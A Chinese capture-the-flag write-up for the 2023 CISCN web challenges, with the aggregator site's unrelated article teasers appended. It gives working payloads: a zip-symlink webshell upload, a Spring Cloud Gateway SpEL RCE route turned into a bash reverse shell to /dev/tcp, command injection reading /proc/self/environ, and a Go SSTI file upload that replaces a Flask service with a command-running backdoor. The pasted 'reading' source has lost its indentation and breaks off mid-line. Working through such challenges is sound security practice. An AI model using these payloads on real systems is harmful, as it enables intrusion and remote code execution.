【CTF】2023Ciscn WEB方向题解

news2024/11/24 21:01:01

前言

太菜了太菜了,太久没打比赛啥也不会做,部分题目可去NSSCTF进行复现:NSSCTF
比赛体验一般,一黑灯基本上题都烂掉

unzip

这道题估计大家都会,算是一道原题了
参考:https://xz.aliyun.com/t/10533
由于环境没了,靠印象记得是exec(“cd /tmp&&unzip -o xxxx”)
unzip肯定想到软链接了,但是这里的命令执行函数是exec,是无回显的,那要怎么利用呢
1.先构造一个指向当前目录也就是/var/www/html的软链接

ln -s /var/www/html test
zip --symlinks test.zip test

这样就得到一个test.zip,直接上传就行,此时test指向/var/www/html
2.再构造一个压缩包,先创建一个名为test的文件夹,在里面写创建一个一句话木马文件,然后压缩

zip -r test1.zip test

这样这个压缩包的结构就是 test/cmd.php
再上传,此时就会将我们的cmd.php直接传到/var/www/html下,那么就可以直接访问了,接下来就是执行命令读flag

backendservice

让我非常遗憾的一题,虽然最后也是沦为50多分
打开题目看到是nacos,网上有几个洞,这里我打的是任意用户添加,当时没截图,用了网上的图,User-Agent改一下,然后传数据就能创建用户了
在这里插入图片描述
创好后进入,可以看他的服务,有一个Spring cloud
翻到一篇文章:https://xz.aliyun.com/t/11493
结合这篇文章,再分析这道题,仔细看看就知道怎么打了,挺有意思的。
现在去看给的jar文件,jd-gui反编译,看配置文件
在这里插入图片描述
服务名为backendservice
在这里插入图片描述
注意name代表的是要在nacos中创建的配置文件的DataID,file-extension则是nacos中所创建的配置文件的格式,group则代表nacos中配置文件对应的组,而server-addr则是nacos的访问地址。可以看到配置应该命名为backcfg,并且格式是json,然后对着填路由,yaml格式是这样

spring:
  cloud:
    gateway:
      routes:
        - id: exam
          order: 0
          uri: lb://backendservice
          predicates:
            - Path=/echo/**
          filters:
            - name: AddResponseHeader
              args:
                name: result
                value: "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'id'}).getInputStream())).replaceAll('\n','').replaceAll('\r','')}"

找个格式转换转一下就是

{
    "spring": {
        "cloud": {
            "gateway": {
                "routes": [
                    {
                        "id": "exam",
                        "order": 0,
                        "uri": "lb://backendservice",
                        "predicates": [
                            "Path=/echo/**"
                        ],
                        "filters": [
                            {
                                "name": "AddResponseHeader",
                                "args": {
                                    "name": "result",
                                    "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'id'}).getInputStream())).replaceAll('\n','').replaceAll('\r','')}"
                                }
                            }
                        ]
                    }
                ]
            }
        }
    }
}

改一下命令

exec(new String[]{'bash','-c','bash -i >& /dev/tcp/xxx/port 0>&1'})

然后反弹了在服务器上直接读flag就行了
因为不熟这个执行的格式导致一直curl不出来,以为哪里出问题了一直没解出来,非常难受= =

dumpit

命令注入
?db=ctf&table_2_dump=123%0acat /proc/self/environ%0a
可以直接看到flag了,据说是非预期…

go_session

题目给了源码,不会go,认真看看
在这里插入图片描述main.go

package main

import (
	"github.com/gin-gonic/gin"
	"main/route"
)

func main() {
	r := gin.Default()
	r.GET("/", route.Index)
	r.GET("/admin", route.Admin)
	r.GET("/flask", route.Flask)
	r.Run("0.0.0.0:80")
}

route.go

package route

import (
	"github.com/flosch/pongo2/v6"
	"github.com/gin-gonic/gin"
	"github.com/gorilla/sessions"
	"html"
	"io"
	"net/http"
	"os"
)

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		session.Values["name"] = "admin"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

	c.String(200, "Hello, guest")
}

func Admin(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] != "admin" {
		http.Error(c.Writer, "N0", http.StatusInternalServerError)
		return
	}
	name := c.DefaultQuery("name", "ssti")
	xssWaf := html.EscapeString(name)
	tpl, err := pongo2.FromString("Hello " + xssWaf + "!")
	if err != nil {
		panic(err)
	}
	out, err := tpl.Execute(pongo2.Context{"c": c})
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	c.String(200, out)
}

func Flask(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		if err != nil {
			http.Error(c.Writer, "N0", http.StatusInternalServerError)
			return
		}
	}
	resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))
	if err != nil {
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	c.String(200, string(body))
}

分析一下代码可以发现,可能要在/admin处进行ssti然后拿flag,但是GO的ssti实际上危害是比较小的,因为go只允许访问传入对象下的属性和方法,所以如果对象下没什么危险的方法的话可能只能造成XSS了。
那么第一步的话就是要伪造一个name=admin的session去访问admin,这里注意到

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

但是看了代码根本没有地方可以去找这个环境变量,由于经验太少,一直想方法去找这个key找不到,后来本地搭建了环境以后直接修改源码的guest路由部分
在这里插入图片描述
然后本地访问一下拿到session再去访问靶机就成功了,赛后看了别的师傅的wp说是没有环境变量,也就是没有这个key…
那么现在下一步就是怎么通过GO的SSTI去读flag
在这里插入图片描述
这里用了html.EscapeString
https://go.dev/src/html/escape.go?s=4324:4358
可以从这里看到源码
在这里插入图片描述
置换了一些xss的危险字符,那么单引号双引号就用不了了,这里参考别的师傅的做法,用类似FLASK的ssti通过request传参
例如有这样的形式

{{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()

可以看到我们传进name参数的字符串中不存在被“拦截”的字符,我们通过别的参数传入
参考pysnow师傅的wp,那么在GO的模板引擎中:
大概是这样的形式,提前给出payload:

{%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form)%}{{c.SaveUploadedFile(file,path)}}&m=xxx&n=xxx

现在再看看入口点

func Admin(c *gin.Context)

前面提到go只允许访问传入对象下的属性和方法,那么就可以从gin.context入手了
并且 go的template只允许调用1个返回值,或者2个返回值并且第二个返回值为error类型的函数 形如a(res)或者a(res,err)
看gin.Context下的几个不需要传参的函数
源码在这:https://github.com/gin-gonic/gin/blob/master/context.go
这边直接用pysnow师傅总结好的来看吧

func (c *Context) HandlerName() string {
    return nameOfFunction(c.handlers.Last())
}
// 结果:main/route.Admin ,可以得到m,n
func (c *Context) FullPath() string {
    return c.fullPath
}
// 这个结果为/admin,first之后是'/',与传参冲突
func (c *Context) ClientIP() string {}
// 结果:10.0.0.1,首尾字符串结果一样,不采用
func (c *Context) RemoteIP() string {}
// 同上
func (c *Context) ContentType() string{}
// 因为要上传文件,所以不能改ContentType

所以可以用HandlerName()
再参考BytesCtf2021 babyweb,通过gin.context下的FormFile和SaveUploadFile函数进行文件上传
第一个可以获取指定名称的上传文件,而第二个可以保存上传的文件到特定目录
那么是否可以通过覆盖flask服务去执行命令,通过访问url/flask?name=
在报错中看到python的源码和路径
在这里插入图片描述

from flask import Flask,request
app = Flask(__name__)

@app.route('/')
def index():
    name = request.args['name']
    return name + 'no ssti'

if __name__== "__main__":
    app.run(host="127.0.0.1",port=5000,debug=True)

那么现在的思路就是:通过SSTI去上传文件覆盖后再执行命令
上传这里也挺好玩的,gin上传文件的方式参考这里
但是这里我没用,我直接用普通的html上传表单就行了

<form enctype="multipart/form-data" action="
http://node1.anna.nssctf.cn:28732/admin"
method="post">
<input name="file" type="file">
<input type="submit" value="submit">
</form>

构造一个恶意的flask

from flask import Flask,request
import os
app = Flask(__name__)

@app.route('/')
def index():
    name = request.args['name']
    res=os.popen(name).read()
    return res

if __name__== "__main__":
    app.run(host="127.0.0.1",port=5000,debug=True)

上传以后抓包,值得注意的是这里要将POST改为GET
在这里插入图片描述
把payload url编码一下,然后发包
在这里插入图片描述
返回Hello !说明传好了
访问flask服务
http://node1.anna.nssctf.cn:28732/flask?name=?name=ls$IFS/
空格用$IFS绕过,flag文件在根目录。不过我复现用的是NSSCTF,flag在环境变量里,CAT一下就看到了
在这里插入图片描述
这里用的是pysnow师傅的方法,我尝试用之前BytesCtf2021 babyweb的写计划任务反弹shell的方法一直没成功,有想法的师傅可以去试试,成功了教教我

reading

赛后atao师傅给了源码,tql

# -*- coding:utf8 -*-
import os
import math
import time
import hashlib
from flask import Flask, request, session, render_template, send_file
from datetime import datetime
app = Flask(__name__)
app.secret_key = hashlib.md5(os.urandom(32)).hexdigest()
key = hashlib.md5(str(time.time_ns()).encode()).hexdigest()

books = os.listdir('./books')
books.sort(reverse=True)


@app.route('/')
def index():
if session:
book = session['book']
page = session['page']
page_size = session['page_size']
total_pages = session['total_pages']
filepath = session['filepath']

words = read_file_page(filepath, page, page_size)
return render_template('index.html', books=books, words=words)

return render_template('index.html', books=books )


@app.route('/books', methods=['GET', 'POST'])
def book_page():
if request.args.get('book'):
book = request.args.get('book')
elif session:
book = session.get('book')
else:
return render_template('index.html', books=books, message='I need book')
book=book.replace('..','.')
filepath = './books/' + book

if request.args.get('page_size'):
page_size = int(request.args.get('page_size'))
elif session:
page_size = int(session.get('page_size'))
else:
page_size = 3000

total_pages = math.ceil(os.path.getsize(filepath) / page_size)

if request.args.get('page'):
page = int(request.args.get('page'))
elif session:
page = int(session.get('page'))
else:
page = 1
words = read_file_page(filepath, page, page_size)
prev_page = page - 1 if page > 1 else None
next_page = page + 1 if page < total_pages else None

session['book'] = book
session['page'] = page
session['page_size'] = page_size
session['total_pages'] = total_pages
session['prev_page'] = prev_page
session['next_page'] = next_page
session['filepath'] = filepath
return render_template('index.html', books=books, words=words )


@app.route('/flag', methods=['GET', 'POST'])
def flag():
if hashlib.md5(session.get('key').encode()).hexdigest() == key:
return os.popen('/readflag').read()
else:
return "no no no"


def read_file_page(filename, page_number, page_size):
for i in range(3):
for j in range(3):
size=page_size + j
offset = (page_number - 1) * page_size+i
try:
with open(filename, 'rb') as file:
file.seek(offset)
words = file.read(size)
return words.decode().split('\n')
except Exception as e:
pass
#if error again
offset = (page_number - 1) * page_size
with open(filename, 'rb') as file:
file.seek(offset)
words = file.read(page_size)
return words.split(b'\n')


if __name__ =

比赛的时候没做出来,等一波NSSCTF上靶机再做

参考文章

pysonw 2023ciscn
nacos未授权添加用户
Nacos结合Spring Cloud Gateway RCE利用
bytesCTF2021
BytesCTF2021

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/585080.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于复旦微FMQL45T900 全国产ARM+FPGA核心板方案

XM745D 是一款基于上海复旦微电子 FMQL45T900 的全国产化 ARM 核心板。该核心板将复旦微的 FMQL45T900&#xff08;与 XILINX 的 XC7Z045-2FFG900I 兼容&#xff09;的最小系统集成在了一个 87*117mm 的 核心板上&#xff0c;可以作为一个核心模块&#xff0c;进行功能性扩展&a…

《QDebug 2023年5月》

一、Qt Widgets 问题交流 1.在 VS 中双击打开 ui 文件后&#xff0c;过一会儿 Qt Designer 就闪退 我是在 Windows11 VS2019/2022 环境遇到这个问题&#xff0c;解决方法是设置 Run in detached window 为 True。 点击 "扩展->QT VS Tools->Options"&#…

通俗易懂理解到底什么是DevOps技术(Windows程序员视角)

我是荔园微风&#xff0c;作为一名在IT界整整25年的老兵&#xff0c;今天我们来聊聊到底什么是DevOps。 相信很多小伙伴为什么搞懂DevOps&#xff0c;已经不知道查了多少论坛的帖子和资料了&#xff0c;但还是很困惑的话&#xff0c;那不妨来看看我这个帖子。希望能有助于你的…

CASA模型NPP及碳源、碳汇模拟

CASA模型 CASA模型是一个基于过程的遥感模型(Potteret al&#xff0c;1993&#xff1b;Potter et al&#xff0c;1994)&#xff0c;耦合了生态系统生产力和土壤碳、氮通量&#xff0c;由网格化的全球气候、辐射、土壤和遥感植被指数数据集驱动。模型包括土壤有机物、微量气体通…

Android Jatpack--ViewModel

1.ViewModel ViewModel是Jetpack的一部分。 ViewModel类旨在以注重生命周期的方式存储和管理界面相关的数据。ViewModel类让数据可在发生屏幕旋转等配置更改后继续留存。 ViewModel出现的背景&#xff1a; ①职责分离 Android开发中&#xff0c;在页面较为简单的情况下&…

【社区分享 - 低代码篇】浪潮低代码引擎UBML和低代码平台inBuilder

【社区分享 - 低代码篇】浪潮低代码引擎UBML和低代码平台inBuilder 文章目录 【社区分享 - 低代码篇】浪潮低代码引擎UBML和低代码平台inBuilder1、inBuilder低代码平台介绍2、inBuilder低代码平台操作指导 1、inBuilder低代码平台介绍 1&#xff09;首先介绍了低代码平台相关背…

分布式应用之zookeeper集群+消息队列Kafka

1.Zookeeper集群的相关知识 1.1 zookeeper的概念 ZooKeeper是一个分布式的&#xff0c;开放源码的分布式应用程序协调服务&#xff0c;是Google的Chubby一个开源的实现&#xff0c;是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件&#xff0c;提供的功能…

00后卷王自述,我真的很卷吗?

前段时间我去面试了一个软件测试公司&#xff0c;成功拿到了offer&#xff0c;薪资也从10k涨到了18k&#xff0c;对于工作都还没两年的我来说&#xff0c;还是比较满意的&#xff0c;毕竟有些工作了3到4年的可能还没有我的高。 在公司一段时间后大家都说我是卷王&#xff0c;其…

CCP4i2之蛋白结构自动构建:Autobuild protein

在解析x射线蛋白晶体结构过程中&#xff0c;最常用的方法就是分子置换&#xff0c;即进行molecular replacement&#xff08;MR&#xff09;时&#xff0c;输入合适的同源蛋白作为model&#xff0c;以及目标蛋白的mtz和sequence&#xff0c;来完成相位解析的过程。 相位求解成…

TDengine 基于SpringBoot 框架和Druid 连接池的TDengine Demo示例

一、前文 TDengine 入门教程——导读 二、JDBC Demo下载 TDengine 官方提供的示例程序源码位于TDengine / TDengine 的 TDengine/examples/JDBC下: JDBCDemo&#xff1a;JDBC 最简单的demo。connectionPools&#xff1a;HikariCP, Druid, dbcp, c3p0 等连接池中使用 taos-jdb…

【刷题之路Ⅱ】迷宫问题升级版——找最短路径

【刷题之路Ⅱ】迷宫问题升级版——找最短路径 一、题目描述二、解题1、方法1——暴力递归更新栈1.1、思路分析1.2、先将栈实现以下1.3、代码实现 一、题目描述 原题连接&#xff1a; 地下迷宫 题目描述&#xff1a; 小青蛙有一天不小心落入了一个地下迷宫,小青蛙希望用自己仅…

C语言深度解析--操作符

目录 操作符 1.算数操作符 2.移位操作符 左移操作符<<&#xff1a; 右移操作符>>&#xff1a; 3.位操作符 按位与&&#xff1a; 按位或 | &#xff1a; 按位异或 ^ &#xff1a; 4.赋值操作符 5.单目操作符 6.关系操作符 7.逻辑操作符 8.条件操作…

这所985复试竟可直接加50分,若复试有科研经历!

本期为大家整理热门院校-“大连理工大学”的择校分析&#xff0c;这个择校分析专题会为大家结合&#xff1a;初试复试占比、复试录取规则&#xff08;是否公平&#xff09;、往年录取录取名单、招生人数、分数线、专业课难度等进行分析。希望能够帮到大家! –所有数据来源于研…

vue:实现简单的拖拽功能

背景 平常做业务很容易遇到拖拽功能&#xff0c;没做之前总觉得会很复杂&#xff0c;今天来看一下到底是怎么实现的。 拖拽API 这是 HTML5 新增的 API&#xff0c;当给元素设置 draggable"true" 的时候&#xff0c;这个元素就可以拖拽了。 <div draggable&quo…

JavaScript全解析——Express框架介绍与入门

本文为千锋资深前端教学老师带来的【JavaScript全解析】系列&#xff0c;文章内含丰富的代码案例及配图&#xff0c;从0到1讲解JavaScript相关知识点&#xff0c;致力于教会每一个人学会JS&#xff01; 文末有本文重点总结&#xff0c;可以收藏慢慢看~ 更多技术类内容&#xf…

Linux 安装nodejs、npm、yarn、nrm(超实用)

前言&#xff1a;初衷想要本地通过dockerfile文件直接把项目打包到linux服务器&#xff0c;不用再本地加载再上传等&#xff0c;后续再贴上配置文件 一、什么是nodejs 来自官网的介绍&#xff0c;Node.js 是一个开源的跨平台 JavaScript 运行时环境。它几乎是任何类型项目的流…

AI加持,Fabric让Power BI生态更强大

在Microsoft Build 2023上微软正式推出了Microsoft Faric预览版&#xff0c;它将Power BI、Azure Synapse、Azure Data Factory的优点整合到了一个统一的SasS服务中。数据工程师、数仓工程师、数据科学家、数据分析师和业务用户可以在Fabric中无缝协作&#xff08;微软这是要卷…

MinIO:基于Go实现的高性能、兼容S3协议的对象存储

High Performance Object Storage for AI 译文&#xff1a;MinIO是一个基于Go实现的高性能、兼容S3协议的对象存储 文档 项目地址&#xff1a;https://github.com/minio/minio官网地址&#xff1a;https://min.io/文档地址&#xff1a;https://docs.min.io/Software Developme…

PyTorch-优化器以及网络模型的修改

目的&#xff1a;优化器可以将神经网络中的参数根据损失函数和反向传播来进行优化&#xff0c;以得到最佳的参数值&#xff0c;让模型预测的更准确。 1. SGD import torch import torchvision from torch import nn from torch.nn import Sequential, Conv2d, MaxPool2d, Flat…

Spring Security 笔记

在Spring Security 5.7.0-M2&#xff0c;我们弃用了 WebSecurityConfigurerAdapter &#xff0c;因为我们鼓励用户转向使用基于组件的安全配置。 为了帮助大家熟悉这种新的配置风格&#xff0c;我们编制了一份常见用例表和推荐的新写法。 配置HttpSecurity Configuration pu…